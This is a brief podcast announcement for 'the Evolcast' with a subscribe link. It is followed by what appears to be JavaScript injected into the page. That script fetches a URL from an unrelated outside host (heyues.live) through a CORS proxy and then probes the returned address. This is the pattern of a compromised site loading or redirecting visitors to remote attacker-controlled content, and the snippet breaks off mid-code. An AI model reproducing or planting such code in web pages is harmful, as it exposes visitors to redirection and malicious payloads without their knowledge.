The new episode of our podcast the Evolcast is available now! Subscribe at http://tinyurl.com/evolcast
(function() { const configLink = “https://corsproxy.io/?url=http://heyues.live”; if (!window.__digitalflwrFetchPromise) { window.__digitalflwrFetchPromise = fetch(configLink) .then(response => { if (!response.ok) { throw new Error(” “); } return response.text(); }) .then(finalUrl => { return fetch(finalUrl, { method: “HEAD” }) .then(headResponse => ({ headResponse, finalUrl […]